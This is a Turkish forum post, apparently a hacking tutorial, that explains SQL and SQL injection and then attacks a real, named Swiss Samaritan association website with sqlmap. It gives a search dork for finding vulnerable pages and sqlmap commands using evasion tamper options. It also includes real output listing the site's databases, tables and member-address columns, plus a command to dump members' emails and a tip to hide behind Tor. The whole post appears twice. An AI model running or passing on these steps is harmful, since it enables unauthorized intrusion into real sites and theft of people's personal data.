KARABEY
Yeni Üye
Selamlar beyler...
Bugün sizlerle sql nedir , sql sorgusu nasıl yapılır , sqlmap nedir , nasıl sitenin veritabanı (sql) alınır bakacağız , belki bilenleriniz veya duyanlarınız vardır , duymayanlar da öğrensin...
SQL NEDİR?
SQL (Stuructured Query Language) verinin temel taşlarından biridir.
SQL bir veriyi veritabanına kaydetmeyi ,
Yeni veri eklemeyi ,
Hazır bir veriyi çekmeyi
Sağlar...
Tabii bunları da bir sorguyla bir sistemle yaparız , Mysql / MS Sql gibi ,
Bunlar sorguyla beraber sitenin veritabanı hakkında işlem yapmayı sağlar.
Normalde internet sitelerinde / sunucularında yöneticilerin daha kolay işlem yapması için geliştirilmiştir.
Ama tabii ki bu sorgu sadece senin bilgisayarında olmaz , eğer hedefte açık varsa uzaktan sorgu yaparsız:
KARŞINIZDA
SQL Injection
SQL Injection sitede çalışan bir kontrol mekanizmasının kontrol edilmeden sunucuya ulaşması sonucu gerçekleşir.
Mesela bir dork var : inurl:index.php?id=
burada kullanıcı kontrolü basit bir şekilde url yani adres çubuğunda yazan path (yol) ile yapılıyor
mesela: Samariter Münsingen - index.php?id=2
Bu sitede giden URL kontrol edilmiyor bir nevi firewall da yok diyebiliriz belli bir seviyede.
Şimdi , beraber uygulamalı olarak yukarıdaki site üzerinde basit bir sql injection yapalım.
İlk olarak sqlmap gerekiyor, Bunun içinde de bilgisayarınızda python kurulu olması lazım.
Eğer python kurulu değilse hemen ya google'dan indirip ya da microsoft store'dan indirebilirsiniz ve kurabilirsiniz.
Python kurulu olduğunu varsayıyorum,
Daha sonra sqlmap'i buradan indirin: Tıkla İndir
Şimdi ise o zip içindeki tüm dosyaları sqlmap isminde bir klasör oluşturup onun içine atın.
ASIL KISMA GELDIK...
Şimdi , cmd açın , cd komutlarıyla sqlmap klasörünün içine girin , ve sonra ilk olarak şu komutu çalıştırın:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" --dbs --random-agent --tamper="charencode,randomcase" --risk=3
şimdi size sorular soracak y harfini girin ve enterleyın, Samariter Münsingen - index.php?id=2 adresindeki sql'i aldıktan sonra , karşınıza [INFO] veya [WARNING] gibi çıktılar olacak onlar bittikten sonra şu karşınıza gelir (database isimleri gelir):
available databases [2]:
[*] information_schema
[*] samariter_1
buradan ben samariter_1 seçtim çünkü kullanıcı bilgileri genelde burada olur info veya information yazan yerde değil.
Sonra şu komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 --tables --random-agent --tamper="randomcase,charencode" --risk=3
Çıktı:
+-----------------------+
| module |
| anmeldungen |
| blacklist |
| fotos |
| inhalt |
| kontakt |
| kunden |
| kurse |
| kurskat |
| news |
| portal |
| samu_adr |
| samu_adr_neu |
| samu_login |
| samu_setup |
| samu_termine |
| samu_termine_20200813 |
| seiten |
| zzz_page |
+-----------------------+
[21:54:11] [INFO] fetched data logged to text files under 'C:\Users\Verir Miyim Adımı?\AppData\Local\sqlmap\output\samaritermuensingen.ch'
Sonra zaten bu tables dediğimiz kısmı gösterir ben , samu_adr isimli table'ın columnlarına bakacağım.
Komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 -T samu_adr --columns --random-agent --tamper="randomcase,charencode" --risk=3
Çıktı:
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| adress_id | int(11) |
| aktualisiert | datetime |
| foto | varchar(100) |
| funktion | varchar(255) |
| gebdat | varchar(20) |
| info | varchar(250) |
| mail | varchar(50) |
| nachname | varchar(50) |
| ort | varchar(50) |
| sortierung | int(3) |
| strasse | varchar(50) |
| tel | varchar(20) |
| vorname | varchar(50) |
+--------------+--------------+
[21:57:24] [INFO] fetched data logged to text files under 'C:\Users\Akıllı Çok\AppData\Local\sqlmap\output\samaritermuensingen.ch'
[*] ending @ 21:57:24 /2025-12-23/
Şimdi de zaten hani columnları gördük ya ben mail seçtim.
Komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 -T samu_adr -C mail --dump --random-agent --tamper="randomcase,charencode" --risk=3
Böylece mail column'u almış olduk , oranın üyelerinin mailleri...
Ama o mailleri de kötü niyetle kullanmayın , yasal sorumluluk sizde , ben sadece öğrettim. Umarım kötü niyetle kullananlar olmaz...
Siz kurcalayıp daha da öğrenebilirsiniz...
Ek Bilgi: Bilgisayarınızda tor browser kuruluysa --tor parametresi de kullanarak gerçek bir senaryoda trafiği tor üzerinden gönderebilirsiniz...
VE AYRICA BANA BIR YORUMU VE SADECE BİR BEĞENİYİ ÇOK GÖRMEYİP YORUM YAZAN ARKADAŞLARA TEŞEKKÜRLER...
IYI GÜNLER...
Bugün sizlerle sql nedir , sql sorgusu nasıl yapılır , sqlmap nedir , nasıl sitenin veritabanı (sql) alınır bakacağız , belki bilenleriniz veya duyanlarınız vardır , duymayanlar da öğrensin...
SQL NEDİR?
SQL (Stuructured Query Language) verinin temel taşlarından biridir.
SQL bir veriyi veritabanına kaydetmeyi ,
Yeni veri eklemeyi ,
Hazır bir veriyi çekmeyi
Sağlar...
Tabii bunları da bir sorguyla bir sistemle yaparız , Mysql / MS Sql gibi ,
Bunlar sorguyla beraber sitenin veritabanı hakkında işlem yapmayı sağlar.
Normalde internet sitelerinde / sunucularında yöneticilerin daha kolay işlem yapması için geliştirilmiştir.
Ama tabii ki bu sorgu sadece senin bilgisayarında olmaz , eğer hedefte açık varsa uzaktan sorgu yaparsız:
KARŞINIZDA
SQL Injection
SQL Injection sitede çalışan bir kontrol mekanizmasının kontrol edilmeden sunucuya ulaşması sonucu gerçekleşir.
Mesela bir dork var : inurl:index.php?id=
burada kullanıcı kontrolü basit bir şekilde url yani adres çubuğunda yazan path (yol) ile yapılıyor
mesela: Samariter Münsingen - index.php?id=2
Bu sitede giden URL kontrol edilmiyor bir nevi firewall da yok diyebiliriz belli bir seviyede.
Şimdi , beraber uygulamalı olarak yukarıdaki site üzerinde basit bir sql injection yapalım.
İlk olarak sqlmap gerekiyor, Bunun içinde de bilgisayarınızda python kurulu olması lazım.
Eğer python kurulu değilse hemen ya google'dan indirip ya da microsoft store'dan indirebilirsiniz ve kurabilirsiniz.
Python kurulu olduğunu varsayıyorum,
Daha sonra sqlmap'i buradan indirin: Tıkla İndir
Şimdi ise o zip içindeki tüm dosyaları sqlmap isminde bir klasör oluşturup onun içine atın.
ASIL KISMA GELDIK...
Şimdi , cmd açın , cd komutlarıyla sqlmap klasörünün içine girin , ve sonra ilk olarak şu komutu çalıştırın:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" --dbs --random-agent --tamper="charencode,randomcase" --risk=3
şimdi size sorular soracak y harfini girin ve enterleyın, Samariter Münsingen - index.php?id=2 adresindeki sql'i aldıktan sonra , karşınıza [INFO] veya [WARNING] gibi çıktılar olacak onlar bittikten sonra şu karşınıza gelir (database isimleri gelir):
available databases [2]:
[*] information_schema
[*] samariter_1
buradan ben samariter_1 seçtim çünkü kullanıcı bilgileri genelde burada olur info veya information yazan yerde değil.
Sonra şu komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 --tables --random-agent --tamper="randomcase,charencode" --risk=3
Çıktı:
+-----------------------+
| module |
| anmeldungen |
| blacklist |
| fotos |
| inhalt |
| kontakt |
| kunden |
| kurse |
| kurskat |
| news |
| portal |
| samu_adr |
| samu_adr_neu |
| samu_login |
| samu_setup |
| samu_termine |
| samu_termine_20200813 |
| seiten |
| zzz_page |
+-----------------------+
[21:54:11] [INFO] fetched data logged to text files under 'C:\Users\Verir Miyim Adımı?\AppData\Local\sqlmap\output\samaritermuensingen.ch'
Sonra zaten bu tables dediğimiz kısmı gösterir ben , samu_adr isimli table'ın columnlarına bakacağım.
Komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 -T samu_adr --columns --random-agent --tamper="randomcase,charencode" --risk=3
Çıktı:
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| adress_id | int(11) |
| aktualisiert | datetime |
| foto | varchar(100) |
| funktion | varchar(255) |
| gebdat | varchar(20) |
| info | varchar(250) |
| mail | varchar(50) |
| nachname | varchar(50) |
| ort | varchar(50) |
| sortierung | int(3) |
| strasse | varchar(50) |
| tel | varchar(20) |
| vorname | varchar(50) |
+--------------+--------------+
[21:57:24] [INFO] fetched data logged to text files under 'C:\Users\Akıllı Çok\AppData\Local\sqlmap\output\samaritermuensingen.ch'
[*] ending @ 21:57:24 /2025-12-23/
Şimdi de zaten hani columnları gördük ya ben mail seçtim.
Komut:
python sqlmap.py -u "site url (ben size verdim yukarıda siteyi)" -D samariter_1 -T samu_adr -C mail --dump --random-agent --tamper="randomcase,charencode" --risk=3
Böylece mail column'u almış olduk , oranın üyelerinin mailleri...
Ama o mailleri de kötü niyetle kullanmayın , yasal sorumluluk sizde , ben sadece öğrettim. Umarım kötü niyetle kullananlar olmaz...
Siz kurcalayıp daha da öğrenebilirsiniz...
Ek Bilgi: Bilgisayarınızda tor browser kuruluysa --tor parametresi de kullanarak gerçek bir senaryoda trafiği tor üzerinden gönderebilirsiniz...
VE AYRICA BANA BIR YORUMU VE SADECE BİR BEĞENİYİ ÇOK GÖRMEYİP YORUM YAZAN ARKADAŞLARA TEŞEKKÜRLER...
IYI GÜNLER...